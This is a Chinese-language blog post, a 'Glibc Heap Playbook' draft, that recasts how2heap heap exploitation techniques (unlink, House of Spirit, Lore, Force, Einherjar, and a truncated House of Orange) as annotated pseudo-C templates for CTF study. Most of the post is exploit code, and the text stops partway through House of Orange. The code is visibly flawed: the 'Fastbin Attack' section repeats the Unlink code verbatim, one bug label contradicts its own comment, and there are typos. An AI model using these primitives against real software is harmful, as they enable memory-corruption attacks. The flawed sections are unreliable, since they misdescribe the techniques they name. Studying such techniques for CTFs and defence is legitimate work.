<!doctype html>



  



    
  

<html class="theme-next logos use-motion" lang="zh-hk">
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">



<meta http-equiv="Cache-Control" content="no-transform">
<meta http-equiv="Cache-Control" content="no-siteapp">












  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css">




  
  
  
  

  
    
    
  

  

  

  

  

  
    
    
    <link href="//fonts.useso.com/css?family=Lato:300,300italic,400,400italic,700,700italic&subset=latin,latin-ext" rel="stylesheet" type="text/css">
  






<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css">

<link href="/css/main.css?v=5.1.0" rel="stylesheet" type="text/css">


  <meta name="keywords" content="Hexo, NexT">








  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=5.1.0">






<meta name="description" content="又是适逢其时的春困。日复滋长的赖床时间和廉价咖啡因并未能击退积怨已久的黑眼圈，也只能寄希望于冷水澡和堆砌文字的无用功了。  上周读到一篇非常优秀的论文：Automatic Techniques to Systematically Discover New Heap Exploitation Primitives, 主要介绍了作者如何在各种堆管理器中自动化寻找攻击利用技巧的工作。虽然对于具体实现部">
<meta property="og:type" content="article">
<meta property="og:title" content="The Glibc Heap Playbook (Preview)">
<meta property="og:url" content="http://matshao.com/2019/03/12/The-Glibc-Heap-Playbook/index.html">
<meta property="og:site_name" content="Mid Station">
<meta property="og:description" content="又是适逢其时的春困。日复滋长的赖床时间和廉价咖啡因并未能击退积怨已久的黑眼圈，也只能寄希望于冷水澡和堆砌文字的无用功了。  上周读到一篇非常优秀的论文：Automatic Techniques to Systematically Discover New Heap Exploitation Primitives, 主要介绍了作者如何在各种堆管理器中自动化寻找攻击利用技巧的工作。虽然对于具体实现部">
<meta property="og:locale" content="zh-hk">
<meta property="og:updated_time" content="2019-04-11T15:58:03.133Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="The Glibc Heap Playbook (Preview)">
<meta name="twitter:description" content="又是适逢其时的春困。日复滋长的赖床时间和廉价咖啡因并未能击退积怨已久的黑眼圈，也只能寄希望于冷水澡和堆砌文字的无用功了。  上周读到一篇非常优秀的论文：Automatic Techniques to Systematically Discover New Heap Exploitation Primitives, 主要介绍了作者如何在各种堆管理器中自动化寻找攻击利用技巧的工作。虽然对于具体实现部">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Logos',
    sidebar: {"position":"left","display":"post"},
    fancybox: true,
    motion: true,
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://matshao.com/2019/03/12/The-Glibc-Heap-Playbook/">





  <title> The Glibc Heap Playbook (Preview) | Mid Station </title>
</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-hk">

  





<script>
  	var _mtac = {};
  	(function() {
  		var mta = document.createElement("script");
  		mta.src = "http://pingjs.qq.com/h5/stats.js?v2.0.4";
  		mta.setAttribute("name", "MTAH5");
  		mta.setAttribute("sid", "500688563");
  		var s = document.getElementsByTagName("script")[0];
  		s.parentNode.insertBefore(mta, s);
  	})();
</script>





  
  
    
  

  <div class="container one-collumn sidebar-position-left page-post-detail ">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
    <div class="header-logos"> 
      <div class="site-meta ">
  
    <div class="site-meta-headline">
      <a href="/">
        <img class="custom-logo-image" src="/images/logo_light.png" alt="Mid Station">
      </a>
    </div>
  

  <div class="custom-logo-site-title">
    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <span class="site-title">Mid Station</span>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>
    
      <p class="site-subtitle"></p>
    
</div>

<div class="site-nav-toggle">
  <button>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
    <span class="btn-bar"></span>
  </button>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br>
            
            首頁
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br>
            
            歸檔
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br>
            
            關於
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 
            
      </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal " itemscope itemtype="http://schema.org/Article">
  <link itemprop="mainEntityOfPage" href="http://matshao.com/2019/03/12/The-Glibc-Heap-Playbook/">

  <span style="display:none" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <meta itemprop="name" content="Matthew Shao">
    <meta itemprop="description" content>
    <meta itemprop="image" content="/images/avatar.gif">
  </span>

  <span style="display:none" itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
    <meta itemprop="name" content="Mid Station">
    <span style="display:none" itemprop="logo" itemscope itemtype="http://schema.org/ImageObject">
      <img style="display:none;" itemprop="url image" alt="Mid Station" src="/images/logo_light.png">
    </span>
  </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">
            
            
              
                The Glibc Heap Playbook (Preview)
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">發表於</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2019-03-12T22:46:02+08:00">
                2019-03-12
              </time>
            

            

            
          </span>

          
            <span class="post-category">
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分類於</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Hack/" itemprop="url" rel="index">
                    <span itemprop="name">Hack</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          

          
          

          

          

        </div>
      </header>
    


    <div class="post-body" itemprop="articleBody">

      
      

      
        <blockquote>
<p>又是适逢其时的春困。日复滋长的赖床时间和廉价咖啡因并未能击退积怨已久的黑眼圈，也只能寄希望于冷水澡和堆砌文字的无用功了。</p>
</blockquote>
<p>上周读到一篇非常优秀的论文：<em>Automatic Techniques to Systematically Discover New Heap Exploitation Primitives</em>, 主要介绍了作者如何在各种堆管理器中自动化寻找攻击利用技巧的工作。虽然对于具体实现部分还没有完全理解透彻，但文中对于利用技巧的表述令人眼前一亮。由于本菜鸟对glibc堆的漏洞利用长期停留在上来就fastbin attack的水平，每次遇到此类题目都会花大量时间来做英文阅读理解（主要是<a href="https://github.com/shellphish/how2heap" target="_blank" rel="noopener">how2heap</a>），即使一眼看出漏洞也要半天才能确认攻击方向动手写exp。<br>对于这种非智力差异导致的战术性缺口，除了多做总结整理也没别的方法了。于是花了几天时间，选取how2heap上面常见的攻击方式按照论文提供的格式重新整理出The Glibc Heap Playbook预览版。</p>
<a id="more"></a>
<p><em>注意：以下所有代码的主要目的是描述漏洞的利用方法，并不能进行编译测试。</em></p>
<p>首先来观摩一下上面介绍的论文当中关于Unlink攻击方法的表示：</p>
<h2 id="Unlink"><a href="#Unlink" class="headerlink" title="Unlink"></a>Unlink</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: any non-fast-bin size</span></span><br><span class="line">    <span class="comment">// dst: where to write (void*)</span></span><br><span class="line">    <span class="comment">// val: target value (ptr to writable memory)</span></span><br><span class="line"><span class="comment">// [BUG] buffer overflow (p1)</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] *dst = val</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake</span> = <span class="title">p2</span>;</span></span><br><span class="line"><span class="comment">// bypassing (1): P-&gt;size == next_chunk(P)-&gt;prev_size</span></span><br><span class="line">fake-&gt;size = <span class="keyword">sizeof</span>(<span class="keyword">void</span>*);</span><br><span class="line"><span class="comment">// bypassing (2): P-&gt;fd-&gt;bk == P &amp;&amp; P-&gt;bk-&gt;fd == P</span></span><br><span class="line">fake-&gt;fd = (<span class="keyword">void</span>*)&amp;p1 - offsetof(struct malloc_chunk, bk);</span><br><span class="line">fake-&gt;bk = (<span class="keyword">void</span>*)&amp;p2 - offsetof(struct malloc_chunk, fd);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">c2</span> = <span class="title">raw_to_chunk</span>(<span class="title">p2</span>);</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] overflowing p1: it shrinks the previous chunk's size,</span></span><br><span class="line"><span class="comment">// tricking 'fake' as the previous chunk</span></span><br><span class="line">c2-&gt;prev_size = chunk_size(sz) - offsetof(struct malloc_chunk, fd);</span><br><span class="line"><span class="comment">// tricking the previus chunk freed, P bit = 0</span></span><br><span class="line">c2-&gt;size &amp;= ~<span class="number">1</span>;</span><br><span class="line"><span class="comment">// triggering unlink(fake) via backward consolidation</span></span><br><span class="line"><span class="built_in">free</span>(p2);</span><br><span class="line"></span><br><span class="line">assert(p1 == (<span class="keyword">void</span>*)&amp;p1 - offsetof(struct malloc_chunk, bk));</span><br><span class="line"><span class="comment">// writing with p1: overwriting itself to dst</span></span><br><span class="line">*(<span class="keyword">void</span>**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;</span><br><span class="line"><span class="comment">// writing with p1: overwriting *dst with val</span></span><br><span class="line">*(<span class="keyword">void</span>**)p1 = (<span class="keyword">void</span>*)val;</span><br><span class="line"></span><br><span class="line">assert(*dst == val);</span><br></pre></td></tr></table></figure>
<p>比起how2heap上面的PoC清楚太多了。<br>OK, 以下进入本人不负责任编写部分。</p>
<h2 id="Fastbin-Attack"><a href="#Fastbin-Attack" class="headerlink" title="Fastbin Attack"></a>Fastbin Attack</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: any non-fast-bin size</span></span><br><span class="line">    <span class="comment">// dst: where to write (void*)</span></span><br><span class="line">    <span class="comment">// val: target value (ptr to writable memory)</span></span><br><span class="line"><span class="comment">// [BUG] buffer overflow (p1)</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] *dst = val</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake</span> = <span class="title">p2</span>;</span></span><br><span class="line"><span class="comment">// bypassing (1): P-&gt;size == next_chunk(P)-&gt;prev_size</span></span><br><span class="line">fake-&gt;size = <span class="keyword">sizeof</span>(<span class="keyword">void</span>*);</span><br><span class="line"><span class="comment">// bypassing (2): P-&gt;fd-&gt;bk == P &amp;&amp; P-&gt;bk-&gt;fd == P</span></span><br><span class="line">fake-&gt;fd = (<span class="keyword">void</span>*)&amp;p1 - offsetof(struct malloc_chunk, bk);</span><br><span class="line">fake-&gt;bk = (<span class="keyword">void</span>*)&amp;p2 - offsetof(struct malloc_chunk, fd);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">c2</span> = <span class="title">raw_to_chunk</span>(<span class="title">p2</span>);</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] overflowing p1: it shrinks the previous chunk's size,</span></span><br><span class="line"><span class="comment">// tricking 'fake' as the previous chunk</span></span><br><span class="line">c2-&gt;prev_size = chunk_size(sz) - offsetof(struct malloc_chunk, fd);</span><br><span class="line"><span class="comment">// tricking the previus chunk freed, P bit = 0</span></span><br><span class="line">c2-&gt;size &amp;= ~<span class="number">1</span>;</span><br><span class="line"><span class="comment">// triggering unlink(fake) via backward consolidation</span></span><br><span class="line"><span class="built_in">free</span>(p2);</span><br><span class="line"></span><br><span class="line">assert(p1 == (<span class="keyword">void</span>*)&amp;p1 - offsetof(struct malloc_chunk, bk));</span><br><span class="line"><span class="comment">// writing with p1: overwriting itself to dst</span></span><br><span class="line">*(<span class="keyword">void</span>**)(p1 + offsetof(struct malloc_chunk, bk)) = dst;</span><br><span class="line"><span class="comment">// writing with p1: overwriting *dst with val</span></span><br><span class="line">*(<span class="keyword">void</span>**)p1 = (<span class="keyword">void</span>*)val;</span><br><span class="line"></span><br><span class="line">assert(*dst == val);</span><br></pre></td></tr></table></figure>
<h2 id="House-of-Spirit"><a href="#House-of-Spirit" class="headerlink" title="House of Spirit"></a>House of Spirit</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: fast-bin size</span></span><br><span class="line">    <span class="comment">// dst: where to allocate fake chunk</span></span><br><span class="line"><span class="comment">// [BUG] Arbitrary Free</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] malloc(sz) == dst</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(<span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake_chunk</span> = <span class="title">raw_to_chunk</span>(<span class="title">dst</span>);</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake_next</span> = <span class="title">raw_to_chunk</span>(<span class="title">dst</span> + <span class="title">malloc_size_to_chunk_size</span>(<span class="title">sz</span>));</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// bypass size check "free(): invalid size"</span></span><br><span class="line">fake_chunk-&gt;size = malloc_size_to_chunk_size(sz);</span><br><span class="line"><span class="comment">// bypass "free(): invalid next size (fast), no need for fastbin size, &gt; 2*SIZE_SZ(16 on x64) &amp;&amp; &lt; av-&gt;system_mem(&lt;128kb)"</span></span><br><span class="line">fake_nex-&gt;size = sz + <span class="number">0x1234</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] Arbitrary Free</span></span><br><span class="line"><span class="built_in">free</span>(dst);</span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span>* victim = <span class="built_in">malloc</span>(sz);</span><br><span class="line">assert(victim == dst)</span><br></pre></td></tr></table></figure>
<h2 id="House-of-Lore"><a href="#House-of-Lore" class="headerlink" title="House of Lore"></a>House of Lore</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// [TACTIC 1] sz1: (smallbin size) OR </span></span><br><span class="line">    <span class="comment">// [TACTIC 2] sz2a: (fastbin size) and sz2b: (largebin size) </span></span><br><span class="line">    <span class="comment">// dst: where to allocate fake chunk, dst2: where to place fake-&gt;fd chunk to bypass check</span></span><br><span class="line"><span class="comment">// [BUG] Use-After-Free</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] malloc(sz) == dst</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// !!CHOOSE [TACTIC 1] OR [TACTIC 2] BASED ON SIZE PRECONDITION!!</span></span><br><span class="line"><span class="comment">// [TACTIC 1]: directly create smallbin chunk</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz1);</span><br><span class="line"><span class="comment">// prevent merge with top chunk</span></span><br><span class="line"><span class="keyword">void</span> *junk1 = <span class="built_in">malloc</span>(<span class="number">0x10</span>); </span><br><span class="line"><span class="built_in">free</span>(p1);</span><br><span class="line"><span class="comment">// now p1 at unsortedbin, malloc sz1a &gt; sz1 to make p1 get into smallbin</span></span><br><span class="line"><span class="keyword">void</span> *junk2 = <span class="built_in">malloc</span>(sz1a)</span><br><span class="line"><span class="comment">// now p1 at smallbin</span></span><br><span class="line"><span class="comment">// [TACTIC 1] end.</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// [TACTIC 2]: use fastbin and largebin to create smallbin</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz2a);</span><br><span class="line"><span class="comment">// prevent merge with top chunk</span></span><br><span class="line"><span class="keyword">void</span> *junk = <span class="built_in">malloc</span>(<span class="number">0x10</span>);</span><br><span class="line"><span class="built_in">free</span>(p1);</span><br><span class="line"><span class="comment">// now p1 at fastdbin, malloc sz2b in largebin size to make p1 get into smallbin</span></span><br><span class="line"><span class="keyword">void</span> *junk2 = <span class="built_in">malloc</span>(sz2b);</span><br><span class="line"><span class="comment">// now p1 at smallbin</span></span><br><span class="line"><span class="comment">// [TACTIC 2] end.</span></span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake</span> = <span class="title">raw_to_chunk</span>(<span class="title">dst</span>);</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake2</span> = <span class="title">raw_to_chunk</span>(<span class="title">dst2</span>);</span></span><br><span class="line"><span class="comment">// bypass 'p1-&gt;bk-&gt;fd == p1' check</span></span><br><span class="line">fake-&gt;fd = p1;</span><br><span class="line"><span class="comment">// bypass 'fake-&gt;bk-&gt;fd == fake' check</span></span><br><span class="line">fake-&gt;bk = fake2;</span><br><span class="line">fake2-&gt;fd = fake;</span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] Use-After-Free: Overwrite p1-&gt;bk when it's on smallbin.</span></span><br><span class="line">p1-&gt;fd = fake;</span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> *junk2 = <span class="built_in">malloc</span>(sz1); <span class="comment">// or sz2a</span></span><br><span class="line"><span class="keyword">void</span> *victim = <span class="built_in">malloc</span>(sz1); <span class="comment">// or sz2a</span></span><br><span class="line">assert(victim == dst)</span><br></pre></td></tr></table></figure>
<h2 id="House-of-Force"><a href="#House-of-Force" class="headerlink" title="House of Force"></a>House of Force</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: aribitrary size</span></span><br><span class="line">    <span class="comment">// dst: where to allocate fake chunk</span></span><br><span class="line"><span class="comment">// [BUG] Arbitrary Free</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] malloc(sz) == dst</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(sz);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">top_chunk</span> = <span class="title">raw_to_chunk</span>(<span class="title">p1</span> + <span class="title">malloc_size_to_chunk_size</span>(<span class="title">sz</span>));</span></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow: overwrite top_chunk-&gt;size.</span></span><br><span class="line">top_chunk-&gt;size = <span class="number">-1</span>;</span><br><span class="line"><span class="comment">// Might result in integer overflow, doesn't matter.</span></span><br><span class="line"><span class="keyword">size_t</span> request_size = dst - top_chunk - <span class="number">2</span>*<span class="keyword">sizeof</span>(<span class="keyword">size_t</span>) - <span class="keyword">sizeof</span>(<span class="keyword">size_t</span>);</span><br><span class="line"></span><br><span class="line"><span class="keyword">void</span>* victim = <span class="built_in">malloc</span>(request_size);</span><br><span class="line">assert(victim == dst)</span><br></pre></td></tr></table></figure>
<h2 id="House-of-Einherjar"><a href="#House-of-Einherjar" class="headerlink" title="House of Einherjar"></a>House of Einherjar</h2><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: (smallbin size)</span></span><br><span class="line">    <span class="comment">// dst: where to allocate fake chunk</span></span><br><span class="line"><span class="comment">// [BUG] Off-by-one Null</span></span><br><span class="line"><span class="comment">// [POST-CONDITION] malloc(sz) == dst</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// The chunk to perform off-by-one null, </span></span><br><span class="line"><span class="comment">// usually chose the size which ((sz1+8) % 0x10 == 0), e.g. 0x38.</span></span><br><span class="line"><span class="keyword">void</span>* p1 = <span class="built_in">malloc</span>(sz1);</span><br><span class="line"><span class="keyword">size_t</span> real_p1_size = malloc_usable_size(p1);</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span class="title">malloc_chunk</span> *<span class="title">fake</span> = <span class="title">raw_to_chunk</span>(<span class="title">dst</span>);</span></span><br><span class="line"><span class="comment">// bypass P-&gt;bk-&gt;size = P-&gt;prev_size, any smallbin size is ok.</span></span><br><span class="line">fake-&gt;prev_size = <span class="number">0x100</span>; <span class="comment">// dst-0x10</span></span><br><span class="line">fake-&gt;size = <span class="number">0x100</span>; <span class="comment">// dst-0x8</span></span><br><span class="line">fake-&gt;fd = fake; <span class="comment">// dst</span></span><br><span class="line">fake-&gt;bk = fake; <span class="comment">// dst+0x8</span></span><br><span class="line">fake-&gt;fd_size = fake; <span class="comment">// dst+0x10</span></span><br><span class="line">fake-&gt;bk_size = fake; <span class="comment">// dst+0x18</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// 0xf8 is easier, because the p2-&gt;size will be 0x101, </span></span><br><span class="line"><span class="comment">// we can use off-by-one null change it to 0x100, </span></span><br><span class="line"><span class="comment">// other value like 0x1f8, 0x2f8 is also convenient,</span></span><br><span class="line"><span class="comment">// but other value will require another fake chunk forge in this chunk.</span></span><br><span class="line"><span class="keyword">void</span> *p2 = <span class="built_in">malloc</span>(<span class="number">0xf8</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] Off-by-one null, change p2-&gt;size from 0x101 to 0x100</span></span><br><span class="line">p1[real_p1_size] = <span class="number">0</span>; <span class="comment">//p1[0x38] = 0</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// write fake p2-&gt;prev_size to end of p1</span></span><br><span class="line"><span class="keyword">size_t</span> fake_size = p2-<span class="keyword">sizeof</span>(<span class="keyword">size_t</span>)*<span class="number">2</span> - fake; <span class="comment">// fake_size = p2-0x10-fake;</span></span><br><span class="line">*(<span class="keyword">size_t</span>*)&amp;p1[real_p1_size-<span class="keyword">sizeof</span>(<span class="keyword">size_t</span>)] = fake_size; <span class="comment">// p1[0x38-8] = fake_size</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// change fake-&gt;size according to calculated fake_size</span></span><br><span class="line">fake-&gt;size = fake_size;</span><br><span class="line"><span class="comment">// free p2 and it will consolidate with our fake chunk</span></span><br><span class="line"><span class="built_in">free</span>(p2);</span><br><span class="line"></span><br><span class="line"><span class="comment">// malloc any size</span></span><br><span class="line"><span class="keyword">void</span>* victim = <span class="built_in">malloc</span>(<span class="number">0x40</span>);</span><br><span class="line"></span><br><span class="line">assert(victim == dst);</span><br></pre></td></tr></table></figure>
<h2 id="House-of-Orange-Phase-1"><a href="#House-of-Orange-Phase-1" class="headerlink" title="House of Orange (Phase 1)"></a>House of Orange (Phase 1)</h2><p>There are two phase in <code>House of Orange</code>, phase 1 is about creating an unsorted bin chunk without using <code>free</code>, phase two is about using unsortedbin attack to hijack control flow.<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// [PRE-CONDITION]</span></span><br><span class="line">    <span class="comment">// sz: sz large enough</span></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow</span></span><br><span class="line"><span class="comment">// [POST-CONDITION]</span></span><br><span class="line">    <span class="comment">// A chunk in unsortedbin</span></span><br><span class="line"></span><br><span class="line"><span class="comment">// origin top_chunk-&gt;size usually is 0x21000,</span></span><br><span class="line"><span class="comment">// after allocating a size of 0x400,</span></span><br><span class="line"><span class="comment">// top_chunk-&gt;size = 0x20c01</span></span><br><span class="line"><span class="keyword">void</span> *p1 = <span class="built_in">malloc</span>(<span class="number">0x400</span><span class="number">-0x10</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// [BUG] Heap Overflow: overwrite top_chunk-&gt;size</span></span><br><span class="line"><span class="class"><span class="keyword">struct</span> <span 